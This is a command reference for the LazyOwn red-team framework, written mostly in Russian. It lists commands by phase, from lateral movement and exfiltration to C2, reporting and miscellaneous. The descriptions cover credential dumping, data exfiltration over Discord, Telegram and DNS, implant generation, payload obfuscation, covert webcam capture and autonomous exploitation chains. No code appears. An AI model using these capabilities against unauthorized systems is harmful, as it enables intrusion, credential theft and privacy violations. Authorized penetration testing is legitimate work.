set_proxychainsФаза: lateral | Источник: cli/commands/lateral.py
Настраивает proxychains для текущей сессии.
shadowsocksФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет инструмент Shadowsocks для создания защищённого туннеля для сетевого трафика.
socatФаза: lateral | Источник: cli/commands/lateral.py
Запускает socat для перенаправления портов.
sshФаза: lateral | Источник: cli/commands/lateral.py
SSH-подключение к удалённому хосту (нестандартный порт).
sshdФаза: lateral | Источник: cli/commands/lateral_migrated.py
Запускает SSH-сервис и отображает его статус.
stormbreakerФаза: lateral | Источник: cli/commands/lateral_migrated.py
Команда stormbreaker: Автоматизирует установку и использование Storm-Breaker для выполнения различных сетевых атак.
targetedKerberoasФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет инструмент targetedKerberoast для извлечения сервисных билетов Kerberos.
tordФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет скрипт tor.sh с указанным портом или по умолчанию использует порт 80, если порт не указан.
upload_c2Фаза: lateral | Источник: cli/commands/lateral_migrated.py
Команда upload в клиенте с использованием C2 для загрузки файла.
vpnФаза: lateral | Источник: cli/commands/lateral_migrated.py
Подключается к VPN, выбирая из доступных .ovpn файлов.
wifipassФаза: lateral | Источник: cli/commands/lateral_migrated.py
Эта функция генерирует PowerShell-скрипт, который извлекает сохранённые пароли Wi-Fi в системе Windows.
wmiexecФаза: lateral | Источник: cli/commands/lateral.py
Выполняет команды через WMI.
wmiexecproФаза: lateral | Источник: cli/commands/lateral_migrated.py
Выполняет wmiexec-pro с различными опциями для операций WMI.
adgetpassФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Генерирует PowerShell-скрипт для извлечения учётных данных Azure AD Connect.
decryptФаза: экфильтрация | Источник: cli/commands/exfiltration.py
Расшифровывает XOR-зашифрованный файл с использованием соответствующего ключа.
dns_beaconФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Запускает DNS-туннельный beacon (маяк).
dns_beacon_statusФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Показывает статус всех DNS-маяков.
dns_exfil_listenФаза: экфильтрация | Источник: cli/commands/dns_exfil.py
Запускает DNS-экфильтрационный слушатель на UDP-порту 53.
download_c2Фаза: экфильтрация | Источник: cli/commands/exfiltration.py
Загружает файл из C2-импланта через команду upload.
dpapi_blobФаза: экфильтрация | Источник: cli/commands/dpapi.py
Расшифровывает DPAPI-blob в автономном режиме.
dpapi_harvestФаза: экфильтрация | Источник: cli/commands/dpapi.py
Собирает все защищённые DPAPI учётные данные с локальной машины.
dpapi_masterkeysФаза: экфильтрация | Источник: cli/commands/dpapi.py
Перечисляет и извлекает мастер-ключи DPAPI.
dplootФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите dploot для извлечения секретов, защищённых DPAPI.
encryptФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Зашифруйте файл с помощью XOR, используя ключ, предоставленный вызывающей стороной.
evidenceФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Закодируйте дерево sessions/ в видеофайл или декодируйте обратно.
evilwinrmФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Управляйте Evil-WinRM с аутентификацией по паролю, хэшу или только Kerberos.
exfil_autoФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Автоматически определяйте флаги и конфиденциальные файлы, затем выполняйте эксфильтрацию.
exfil_discordФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Эксфильтрируйте файл через вебхук Discord.
exfil_dnsФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Эксфильтрируйте данные через DNS-туннелирование.
exfil_gcsФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Загрузите файл в Google Cloud Storage.
exfil_httpФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Эксфильтрируйте файл через HTTP POST на контролируемый сервер.
exfil_s3Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Загрузите файл в корзину AWS S3.
exfil_start_serverФаза: эксфильтрация | Источник: cli/commands/dns_exfil.py
Запустите все необходимые прослушиватели для эксфильтрации.
exfil_telegramФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Эксфильтрируйте файл через Telegram Bot API.
getadusersФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите impacket-GetADUsers для перечисления учётных записей AD на контроллере домена.
getnthash_pyФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Восстановите NT-хэш из Kerberos U2U TGS с помощью PKINITtools.
getuserspnsФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите impacket-GetUserSPNs для запроса сервисных билетов, пригодных для roasting.
gitdumperФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Установите git-dumper, если он отсутствует, и загрузите удалённое дерево .git.
gmsadumperФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите gMSADumper для чтения блобов паролей gMSA, видимых текущему пользователю.
http_exfil_serverФаза: эксфильтрация | Источник: cli/commands/dns_exfil.py
Запустите минимальный HTTP-приёмник для эксфильтрации.
reg_pyФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запросите удалённый реестр с помощью impacket-reg.py при аутентификации по хэшу.
rsyncФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Отправьте дерево sessions/ на rhost по SCP с помощью sshpass.
samdump2Фаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите samdump2 для файлов sessions/SYSTEM и sessions/SAM.
secretsdumpФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Запустите impacket-secretsdump для SAM, учётных данных или полезных нагрузок NTDS.
smb_exfilФаза: эксфильтрация | Источник: cli/commands/dns_exfil.py
Эксфильтрируйте файлы в SMB-ресурс на машине атакующего.
stageФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Подготовьте данные для эксфильтрации: сжатие, шифрование и разделение.
unzipФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Извлеките zip-архив, расположенный в sessions/.
upload_gofileФаза: эксфильтрация | Источник: cli/commands/exfiltration.py
Загрузите файл из sessions/ на Gofile через его HTTP API.
apt_playbookФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Список, проверка и запуск плейбуков APT на основе публичных отчётов об угрозах.
atomic_agentФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Генерация и синхронизация скриптов атомарных агентов.
atomic_genФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Генерация тестовых скриптов и скриптов очистки для заданного идентификатора техники Atomic Red Team.
atomic_testsФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Выполнение тестов Atomic Red Team на основе выбранной пользователем платформы и теста.
attack_planФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Выполнение многошагового плана симуляции APT на основе идентификаторов тестов Atomic Red Team.
automsfФаза: C2 | Источник: cli/commands/command_and_control_migrated.py
Попробуйте проверить уязвимость, используя модуль, переданный в качестве аргумента lazyown, например automsf exploit/windows/iis/iis_webdav_upload_asp для использования в Metasploit.
c2Фаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Управление настройкой C2-сервера и компиляцией агента.
c2_beacon_cmdФаза: c2 | Источник: cli/commands/command_and_control.py
Поставить команду в очередь для выполнения на подключенном маяке (beacon).
c2_beaconsФаза: c2 | Источник: cli/commands/command_and_control.py
Список всех активных сессий маяков с отметками времени последнего появления.
c2_implantФаза: c2 | Источник: cli/commands/command_and_control.py
Создание скомпилированной полезной нагрузки импланта для целевой платформы.
c2_keygenФаза: c2 | Источник: cli/commands/command_and_control.py
Генерация нового ключа AES-256 для шифрования маяка.
c2_quickstartФаза: c2 | Источник: cli/commands/command_and_control.py
Быстрая настройка C2: генерация ключа, подготовка каталога импланта, вывод команд маяка.
c2_statusФаза: c2 | Источник: cli/commands/command_and_control.py
Показать сводный статус C2: прослушиватели, маяки, импланты и сессии.
calderaФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Устанавливает и запускает сервер Caldera.
caldera_exportФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Экспорт плейбука LazyOwn в YAML-формат способностей CALDERA.
caldera_importФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Импорт способностей CALDERA в плейбуки LazyOwn.
duckysparkФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
duckyspark Компилирует и загружает .ino скетч на устройство Digispark с помощью Arduino CLI и Micronucleus.
emp3r0rФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Команда emp3r0r Загружает и настраивает сервер Emperor для локальной эксплуатации.
empireФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Генерирует полезные нагрузки с помощью PowerShell Empire с различными опциями.
generate_playbookФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Генерирует плейбук, который интегрирует тесты Atomic Red Team и техники MITRE ATT&CK.
iis_webdav_upload_aspФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
(CVE-2017-7269). Уязвим при использовании модуля iis_webdav_upload_asp из Metasploit.
listenerФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Управление прослушивателями C2: список, добавление, запуск, остановка, удаление.
mitre_testФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Взаимодействие с фреймворком MITRE ATT&CK с использованием формата STIX 2.0.
msfФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Автоматизирует различные задачи Metasploit, включая сканирование уязвимостей, настройку обратных оболочек и создание полезных нагрузок.
msfrpcФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Подключается к демону msfrpcd и позволяет удаленно управлять Metasploit.
my_playbookФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Генерирует плейбук из вашей пользовательской базы техник.
sandboxФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Переключение или запрос режима песочницы Docker.
sliver_serverФаза: c2 | Источник: cli/commands/command_and_control_migrated.py
Запускает сервер Sliver и генерирует файл конфигурации клиента для подключающихся клиентов.
aproposФаза: отчет | Источник: cli/commands/report_migrated.py
Поиск команд, соответствующих заданному параметру, в интерфейсе cmd и при необходимости расширение поиска с помощью системной команды apropos.
bannersФаза: отчет | Источник: cli/commands/report.py
Управление пользовательскими баннерами для фреймворка.
c2asmФаза: отчет | Источник: cli/commands/report_migrated.py
Отображение кода C и ASM рядом в интерфейсе на основе curses.
camphishФаза: отчет | Источник: cli/commands/report_migrated.py
Выполняет инструмент camphish для получения снимков с фронтальной камеры телефона цели или веб-камеры ПК, просто отправив ссылку.
create_session_jsonФаза: отчет | Источник: cli/commands/report.py
Создать JSON сессии. Создать файл JSON-отчёта сессии.
createjsonmachineФаза: отчёт | Источник: cli/commands/report_migrated.py
Создать новый файл JSON-нагрузки на основе шаблона, предоставленного в payload.json.
createjsonmachine_batchФаза: отчёт | Источник: cli/commands/report_migrated.py
Создать несколько файлов JSON-нагрузки на основе входного CSV-файла из HackerOne.
createtargetsФаза: отчёт | Источник: cli/commands/report.py
Создать файл целей из результатов сканирования nmap.
download_malwarebazarФаза: отчёт | Источник: cli/commands/report_migrated.py
Загрузить образец вредоносного ПО из MalwareBazaar, используя его SHA256-хэш.
extract_portsФаза: отчёт | Источник: cli/commands/report_migrated.py
Извлечь информацию об открытых портах и IP-адресах из указанного файла.
eyewitnessФаза: отчёт | Источник: cli/commands/report.py
Запустить EyeWitness для захвата скриншотов веб-страниц.
eyewitness_pyФаза: отчёт | Источник: cli/commands/report_migrated.py
Автоматизирует установку и выполнение EyeWitness без необходимости ввода данных пользователем.
gen_reportФаза: отчёт | Источник: cli/commands/report_enhanced.py
Создать улучшенные профессиональные отчёты по результатам тестирования на проникновение.
get_avaible_actionsФаза: отчёт | Источник: cli/commands/report_migrated.py
Получить список поддерживаемых действий.
gowitnessФаза: отчёт | Источник: cli/commands/report.py
Запустить gowitness для захвата скриншотов веб-страниц.
gptФаза: отчёт | Источник: cli/commands/report.py
Запросить GPT/Groq AI для анализа и составления отчётов.
img2vidФаза: отчёт | Источник: cli/commands/report_migrated.py
Создаёт MP4-видео из PNG-изображений, найденных в каталоге sessions/captured_images.
lazyreportФаза: отчёт | Источник: cli/commands/report_migrated.py
Создать профессиональный отчёт red team на основе данных сессии.
malwarebazarФаза: отчёт | Источник: cli/commands/report.py
Поиск образцов вредоносного ПО в Malware Bazaar.
morseФаза: отчёт | Источник: cli/commands/report_migrated.py
Интерактивный преобразователь кода Морзе.
name_the_hashФаза: отчёт | Источник: cli/commands/report_migrated.py
Определить тип хэша с помощью nth после получения его через get_hash().
nmapscripthelpФаза: отчёт | Источник: cli/commands/report_migrated.py
Предоставляет помощь в поиске и отображении информации о скриптах Nmap.
process_scansФаза: отчёт | Источник: cli/commands/report_migrated.py
Обрабатывает CSV-файлы с результатами сканирования и данными об уязвимостях для создания JSON-базы данных в стиле Shodan.
pth_netФаза: отчёт | Источник: cli/commands/report_migrated.py
Выполняет инструмент Pass-the-Hash (PTH) Net для смены пароля учётной записи Active Directory.
pupФаза: отчёт | Источник: cli/commands/report_migrated.py
Обрабатывает HTML-содержимое указанного URL с помощью утилиты pup и селектора CSS по умолчанию.
vulnsФаза: отчёт | Источник: cli/commands/report.py
Отобразить или управлять уязвимостями.
EOFФаза: разное | Источник: cli/commands/misc_migrated.py
Обработка условия конца файла (EOF).
acknowledgearpФаза: разное | Источник: cli/commands/misc_migrated.py
Настраивает систему на подтверждение ARP-запросов путём установки параметра ядра.
acknowledgeicmpФаза: разное | Источник: cli/commands/misc_migrated.py
Настраивает систему на ответ на ICMP-эхо-запросы путём установки параметра ядра.
addaliasФаза: разное | Источник: cli/commands/misc_migrated.py
Добавить новый алиас с поддержкой плейсхолдеров, таких как {rhost}, {lhost}, {lport} и т.д.
addhostsФаза: разное | Источник: cli/commands/misc_migrated.py
Добавляет запись в файл /etc/hosts, сопоставляя IP-адрес с доменным именем.
aliassФаза: разное | Источник: cli/commands/misc_migrated.py
Выводит все настроенные алиасы и связанные с ними команды.
assignФаза: разное | Источник: cli/commands/misc_migrated.py
Присвоить значение параметра, сохранить в payload.json и обновить алиасы.
backФаза: разное | Источник: cli/commands/module_manager.py
Покинуть контекст текущего модуля.
bannerФаза: разное | Источник: cli/commands/misc_migrated.py
Показать баннер
base64decodeФаза: misc | Источник: cli/commands/misc_migrated.py
Декодирует строку в кодировке Base64.
base64encodeФаза: misc | Источник: cli/commands/misc_migrated.py
Кодирует заданную строку в формат Base64.
browseФаза: misc | Источник: cli/commands/misc_migrated.py
Открывает TUI-браузер сессий (sessions/).
campaignФаза: misc | Источник: cli/commands/campaign.py
Экспортирует или импортирует всю кампанию как переносимый пакет.
catalogФаза: misc | Источник: cli/commands/catalog.py
Просмотр каталога команд.
chainmodeФаза: misc | Источник: cli/commands/misc_migrated.py
Переключает интерактивное объединение цепочек атак (kill-chain) после каждой команды.
check_updateФаза: misc | Источник: cli/commands/misc_migrated.py
Проверяет наличие обновлений, сравнивая локальную версию с удалённой.
cleanФаза: misc | Источник: cli/commands/misc_migrated.py
Удаляет файлы и каталоги в директории sessions, исключая указанные файлы и каталоги.
clockФаза: misc | Источник: cli/commands/misc_migrated.py
Отображает текущую дату и время, а также выполняет пользовательский shell-скрипт.
clone_siteФаза: misc | Источник: cli/commands/misc_migrated.py
Клонирует веб-сайт и обслуживает файлы в sessions/{url_cloned}.
collab_joinФаза: misc | Источник: cli/commands/misc_migrated.py
Выводит URL для совместной работы нескольких операторов и SSE-эндпоинт.
config_bannerФаза: misc | Источник: cli/commands/misc_migrated.py
Открывает мастер в стиле Powerlevel10k для переключения сегментов приглашения.
cred_mark_failedФаза: misc | Источник: cli/commands/automation.py
Помечает учётные данные как неудачные для конкретного хоста.
cred_reuseФаза: misc | Источник: cli/commands/automation.py
Анализирует перехваченные учётные данные и предлагает цели для распыления (spray).
cronФаза: misc | Источник: cli/commands/misc_migrated.py
Планирует выполнение команды в указанное время.
ctxФаза: misc | Источник: cli/commands/misc_migrated.py
Выводит однострочный контекст оператора: rhost, lhost, domain, phase, os, creds.
daemon_approveФаза: misc | Источник: cli/commands/misc_migrated.py
Одобряет или отклоняет текущее ожидающее действие демона.
daemon_focusФаза: misc | Источник: cli/commands/misc_migrated.py
Ограничивает автономного демона набором целевых объектов фокусировки.
daemon_modeФаза: misc | Источник: cli/commands/misc_migrated.py
Переключает автономного демона между режимами auto, approval и paused.
daemon_pauseФаза: misc | Источник: cli/commands/misc_migrated.py
Приостанавливает автономного демона перед следующим шагом.
daemon_resumeФаза: misc | Источник: cli/commands/misc_migrated.py
Возобновляет работу автономного демона (переключает режим на auto).
daemon_vetoФаза: misc | Источник: cli/commands/misc_migrated.py
Добавляет или очищает запрещённые первые токены команд для автономного демона.
dashboardФаза: misc | Источник: cli/commands/misc_migrated.py
Запускает полноэкранную панель оператора LazyOwn (Textual TUI).
db_credsФаза: misc | Источник: cli/commands/database.py
Выводит список или добавляет учётные данные.
db_exportФаза: misc | Источник: cli/commands/database.py
Экспортирует таблицу базы данных в CSV.
db_hostsФаза: misc | Источник: cli/commands/database.py
Выводит список или добавляет хосты в активной рабочей области.
db_importФаза: misc | Источник: cli/commands/database.py
Импортирует результаты сканирования в базу данных.
db_initФаза: misc | Источник: cli/commands/database.py
Инициализирует базу данных (создаёт схему, если она не существует).
db_lootФаза: misc | Источник: cli/commands/database.py
Выводит список или добавляет элементы добычи (loot).
db_notesФаза: misc | Источник: cli/commands/database.py
Выводит список или добавляет заметки.
db_servicesФаза: misc | Источник: cli/commands/database.py
Выводит список всех служб в активной рабочей области.
db_statusФаза: misc | Источник: cli/commands/database.py
Показывает количество сущностей для активной рабочей области.
db_vulnsФаза: misc | Источник: cli/commands/database.py
Выводит список или добавляет уязвимости.
db_workspaceФаза: misc | Источник: cli/commands/database.py
Управляет рабочими областями (список, создание, переключение, удаление).
decodeФаза: misc | Источник: cli/commands/misc_migrated.py
Декодирует строку с использованием указанного значения сдвига и ключа подстановки.
doctorФаза: misc | Источник: cli/commands/misc_migrated.py
Предварительная проверка работоспособности окружения — убедитесь, что установка готова.
download_resourcesФаза: misc | Источник: cli/commands/misc_migrated.py
Загружает ресурсы в каталог sessions.
encodeФаза: misc | Источник: cli/commands/misc_migrated.py
Кодирует строку с использованием указанного значения сдвига и ключа подстановки.
encoderpayloadФаза: misc | Источник: cli/commands/misc_migrated.py
Применяет различные обфускации к заданной строке командной строки для создания нескольких обфусцированных версий.
encodewinbase64Фаза: misc | Источник: cli/commands/misc_migrated.py
Кодирует заданную полезную нагрузку в строку Base64, подходящую для выполнения в Windows PowerShell.
engageФаза: misc | Источник: cli/commands/misc_migrated.py
Проводит одну цель через полную цепочку атаки одной командой.
exitФаза: misc | Источник: cli/commands/misc_migrated.py
Выход из интерфейса командной строки.
exploreФаза: misc | Источник: cli/commands/misc_migrated.py
Показывает охват исследования и предложения по аддонам/инструментам для каждого сервиса.
fixelФаза: misc | Источник: cli/commands/misc_migrated.py
Исправляет права доступа к файлам и окончания строк в каталогах проекта.
fixpermФаза: misc | Источник: cli/commands/misc_migrated.py
Исправляет права доступа для shell-скриптов LazyOwn.
gencertФаза: misc | Источник: cli/commands/misc_migrated.py
Генерирует центр сертификации (CA), клиентский сертификат и клиентский ключ.
generateФаза: misc | Источник: cli/commands/payload_generation.py
Сгенерировать полезную нагрузку.
getseclistФаза: misc | Источник: cli/commands/misc_migrated.py
Получить словарь SecLists с GitHub.
god_nodesФаза: misc | Источник: cli/commands/misc_migrated.py
Показать наиболее связанные узлы («божественные узлы») из графа.
graphФаза: misc | Источник: cli/commands/misc_migrated.py
Генерирует граф из JSON-файлов полезной нагрузки, содержащих URL, RHOST и RPORT.
graph_overlayФаза: misc | Источник: cli/commands/misc_migrated.py
Открыть наложение графа поверх графа знаний graphify.
graph_searchФаза: misc | Источник: cli/commands/misc_migrated.py
Нечёткий поиск узлов по метке в графе знаний graphify.
gymФаза: misc | Источник: cli/commands/redteam_gym.py
Red Team Gym — геймифицированное обучение пентесту с рейтингом ELO.
hФаза: misc | Источник: cli/commands/misc_migrated.py
Открыть новое окно в сессии tmux с использованием LazyOwn RedTeam Framework.
hex_to_plaintextФаза: misc | Источник: cli/commands/misc_migrated.py
Преобразует шестнадцатеричные данные из файла в обычный текст.
hooksФаза: misc | Источник: cli/commands/automation.py
Управление условными хуками — список, включение, отключение, добавление, удаление правил.
hooks_addФаза: misc | Источник: cli/commands/automation.py
Добавить новое правило условного хука (JSON-строка).
hooks_enableФаза: misc | Источник: cli/commands/automation.py
Включить или отключить правило хука.
hooks_fireФаза: misc | Источник: cli/commands/automation.py
Вручную вызвать событие хука для тестирования.
hooks_listФаза: misc | Источник: cli/commands/automation.py
Перечислить все правила условных хуков.
hooks_removeФаза: misc | Источник: cli/commands/automation.py
Удалить правило хука по имени.
huntФаза: misc | Источник: cli/commands/misc_migrated.py
Запустить автономную цепочку эксплуатации против цели.
ignorearpФаза: misc | Источник: cli/commands/misc_migrated.py
Настраивает систему на игнорирование ARP-запросов путем установки параметра ядра.
ignoreicmpФаза: misc | Источник: cli/commands/misc_migrated.py
Настраивает систему на игнорирование ICMP-эхо-запросов путем установки параметра ядра.
ipФаза: misc | Источник: cli/commands/misc_migrated.py
Отображает IP-адреса сетевых интерфейсов и копирует IP-адрес интерфейса tun0 в буфер обмена.
ip2asnФаза: misc | Источник: cli/commands/misc_migrated.py
Команда для получения ASN для заданного IP-адреса.
ip2hexФаза: misc | Источник: cli/commands/misc_migrated.py
Convert an IPv4 address into its hexadecimal representation.
ippPhase: misc | Source: cli/commands/misc_migrated.py
Отображает IP-адреса сетевых интерфейсов и выводит IP-адрес интерфейса tun0.
karmaPhase: misc | Source: cli/commands/misc_migrated.py
Показывает рейтинг ELO, уровень кармы и прогресс исследования для этого оператора.
kickPhase: misc | Source: cli/commands/misc_migrated.py
Обрабатывает процесс отправки поддельного ARP-пакета на указанный IP-адрес с заданным MAC-адресом.
killchainPhase: misc | Source: cli/commands/misc_migrated.py
Показывает общий прогресс цепочки атак и управляет автоматическим обновлением.
l00tPhase: misc | Source: cli/commands/misc_migrated.py
Единая добыча: показать, искать, повторно использовать, строить граф и помечать учётные данные.
labPhase: misc | Source: cli/commands/lab.py
Управление локальными лабораториями для практики CTF.
lazyscriptPhase: misc | Source: cli/commands/misc_migrated.py
Выполняет команды, определённые в файле lazyscript.
linksPhase: misc | Source: cli/commands/misc_migrated.py
Отображает список полезных ссылок и позволяет пользователю выбрать и скопировать ссылку в буфер обмена.
listPhase: misc | Source: cli/commands/misc_migrated.py
Перечисляет все доступные скрипты в каталоге модулей.
listaliasesPhase: misc | Source: cli/commands/misc_migrated.py
Перечисляет все доступные алиасы.
load_sessionPhase: misc | Source: cli/commands/misc_migrated.py
Загружает сессию из файла sessionLazyOwn.json и отображает статус различных параметров.
lock_targetPhase: misc | Source: cli/commands/collaboration.py
Получает рекомендательную блокировку на цель для предотвращения конфликтов инструментов.
loginPhase: misc | Source: cli/commands/cli_auth.py
Выполняет аутентификацию через users.json (те же пользователи, что и в lazyc2.py).
logoutPhase: misc | Source: cli/commands/cli_auth.py
Выход текущего оператора CLI и очистка токена запоминания.
lolbas_listPhase: misc | Source: cli/commands/pwn.py
Перечисляет доступные техники LOLBAS (Living Off The Land) из плагинов.
lootPhase: misc | Source: cli/commands/misc_migrated.py
Алиас для l00t — единая добыча (показать/искать/повторно использовать/граф/пометить).
makercPhase: misc | Source: cli/commands/resource_scripting.py
Записывает команды сессии в ресурсный скрипт.
marketplacePhase: misc | Source: cli/commands/marketplace.py
Поиск и установка плагинов, дополнений и инструментов сообщества.
marketplace_configPhase: misc | Source: cli/commands/marketplace.py
Интерактивный менеджер маркетплейса (curses TUI).
mkrcPhase: misc | Source: cli/commands/resource_scripting.py
Алиас для makerc — запись команд в скрипт.
msfshellcoderPhase: misc | Source: cli/commands/misc_migrated.py
Генерирует шелл-код в формате C с помощью msfvenom для пользовательской команды или для обратной оболочки (reverse shell).
nanoPhase: misc | Source: cli/commands/misc_migrated.py
Открывает или создаёт файл, используя строку в каталоге сессий, для редактирования с помощью nano.
neighborsPhase: misc | Source: cli/commands/misc_migrated.py
Показывает соседей узла или команды в графе graphify.
newsPhase: misc | Source: cli/commands/misc_migrated.py
Показывает Hacker News в терминале.
nextPhase: misc | Source: cli/commands/misc_migrated.py
Показывает рекомендации по следующему шагу или выполняет активную автоподсказку.
notePhase: misc | Source: cli/commands/misc_migrated.py
Захватывает быструю заметку оператора, привязанную к текущей цели и фазе.
notifyPhase: misc | Source: cli/commands/misc_migrated.py
Команда для запуска уведомления в стиле toastr.
op_createPhase: misc | Source: cli/commands/caldera.py
Создать новую запланированную операцию.
op_listPhase: misc | Source: cli/commands/caldera.py
Перечислить все операции.
op_pausePhase: misc | Source: cli/commands/caldera.py
Приостановить выполняющуюся операцию.
op_planPhase: misc | Source: cli/commands/caldera.py
Заполнить шаги операции из playbook YAML или через вывод MITRE.
op_reportPhase: misc | Source: cli/commands/caldera.py
Сгенерировать полный отчёт по операции.
op_resumeФаза: разное | Источник: cli/commands/caldera.py
Возобновить приостановленную операцию.
op_startФаза: разное | Источник: cli/commands/caldera.py
Запустить (или возобновить) операцию.
op_statusФаза: разное | Источник: cli/commands/caldera.py
Показать статус операции.
op_stopФаза: разное | Источник: cli/commands/caldera.py
Остановить выполняющуюся операцию.
op_timelineФаза: разное | Источник: cli/commands/caldera.py
Показать временную шкалу событий операции.
operator_createФаза: разное | Источник: cli/commands/automation.py
Создать новый профиль оператора.
operator_deleteФаза: разное | Источник: cli/commands/automation.py
Удалить профиль оператора.
operator_loadФаза: разное | Источник: cli/commands/automation.py
Загрузить эффективную конфигурацию для оператора (базовая линия команды + переопределения).
operatorsФаза: разное | Источник: cli/commands/automation.py
Перечислить все профили операторов.
paletteФаза: разное | Источник: cli/commands/misc_migrated.py
Просмотреть каталог команд оператора, сгруппированных по фазе kill-chain.
palette_kФаза: разное | Источник: cli/commands/misc_migrated.py
Открыть нечёткий оверлей палитры Command-K.
payloadФаза: разное | Источник: cli/commands/misc_migrated.py
Загрузить параметры из указанного JSON-файла полезной нагрузки.
phaseФаза: разное | Источник: cli/commands/misc_migrated.py
Получить или установить текущую фазу kill-chain.
pipelineФаза: разное | Источник: cli/commands/misc_migrated.py
Декларативный слой композиции: запуск YAML-конвейера команд LazyOwn.
pivotФаза: разное | Источник: cli/commands/misc_migrated.py
Записать недавно обнаруженную цель для перехода или показать цепочку переходов.
planФаза: разное | Источник: cli/commands/caldera.py
Выбрать следующую наилучшую технику для выполнения для цели.
plan_applyФаза: разное | Источник: cli/commands/caldera.py
Запустить планировщик, затем автоматически создать и запустить операцию.
plan_detailФаза: разное | Источник: cli/commands/caldera.py
Показать полный ранжированный план (все кандидаты) для цели.
popФаза: разное | Источник: cli/commands/misc_migrated.py
Открыть центрированное всплывающее окно в текущей tmux-сессии для выполнения shell-команды.
prevФаза: разное | Источник: cli/commands/misc_migrated.py
Показать предварительные команды для глагола (стрелка prev цепочки).
pwdФаза: разное | Источник: cli/commands/misc_migrated.py
Отображает текущую рабочую директорию и список файлов, а также копирует путь текущей директории в буфер обмена.
qaФаза: разное | Источник: cli/commands/misc_migrated.py
Быстро завершает приложение без подтверждения.
recommend_nextФаза: разное | Источник: cli/commands/misc_migrated.py
Рекомендовать следующее действие через единый механизм рекомендаций.
registerФаза: разное | Источник: cli/commands/cli_auth.py
Зарегистрировать новую учётную запись оператора в users.json.
resourceФаза: разное | Источник: cli/commands/resource_scripting.py
Запустить улучшенный ресурсный скрипт.
rhostФаза: разное | Источник: cli/commands/misc_migrated.py
Копирует удалённый хост (self.params['rhost']) в буфер обмена и обновляет приглашение командной строки.
rich_tuiФаза: разное | Источник: cli/commands/pwn.py
Запустить TUI-панель мониторинга на основе Rich.
rotФаза: разное | Источник: cli/commands/misc_migrated.py
Применить шифр подстановки ROT (вращение) к заданной строке.
rotfФаза: разное | Источник: cli/commands/misc_migrated.py
Применить шифр подстановки ROT (вращение) к заданному расширению.
rrhostФаза: разное | Источник: cli/commands/misc_migrated.py
Обновляет приглашение командной строки, чтобы включить удалённый хост (self.params['rhost']) и текущую рабочую директорию.
runФаза: разное | Источник: cli/commands/misc_migrated.py
Запускает конкретный скрипт LazyOwn или активный модуль.
scansФаза: разное | Источник: cli/commands/misc_migrated.py
Перечислить файлы сканирования nmap в sessions/ с возрастом, размером и открытыми портами.
scopeФаза: разное | Источник: cli/commands/misc_migrated.py
Управлять авторизованной областью взаимодействия и состоянием защиты области.
searchФаза: разное | Источник: cli/commands/module_manager.py
Поиск модулей по имени, описанию или автору.
shФаза: разное | Источник: cli/commands/misc_migrated.py
Выполняет команду оболочки непосредственно из интерфейса LazyOwn.
share_findingФаза: разное | Источник: cli/commands/collaboration.py
Поделиться находкой или обнаруженными учетными данными с командой.
showФаза: разное | Источник: cli/commands/misc_migrated.py
Показать параметры, модули, полезные нагрузки или активные параметры модуля.
sitrepФаза: разное | Источник: cli/commands/misc_migrated.py
Вывести единый оперативный сводный отчет о ситуации.
spoolФаза: разное | Источник: cli/commands/resource_scripting.py
Записывать вывод сеанса в файл.
stealth_offФаза: разное | Источник: cli/commands/pwn.py
Отключить режим скрытности.
suggest_nextФаза: разное | Источник: cli/commands/misc_migrated.py
Предложить следующие команды, перемещаясь по графу на основе недавней активности.
sysФаза: разное | Источник: cli/commands/misc_migrated.py
Выполняет команду оболочки непосредственно из интерфейса LazyOwn.
tabФаза: разное | Источник: cli/commands/misc_migrated.py
Выполняет скрипт lazypyautogui.py с дополнительными аргументами.
tasksФаза: разное | Источник: cli/commands/misc_migrated.py
Просмотр и управление очередью задач из sessions/tasks.json.
team_chatФаза: разное | Источник: cli/commands/collaboration.py
Отправить сообщение всем подключенным операторам.
team_statusФаза: разное | Источник: cli/commands/collaboration.py
Показать активных операторов и блокировки целей.
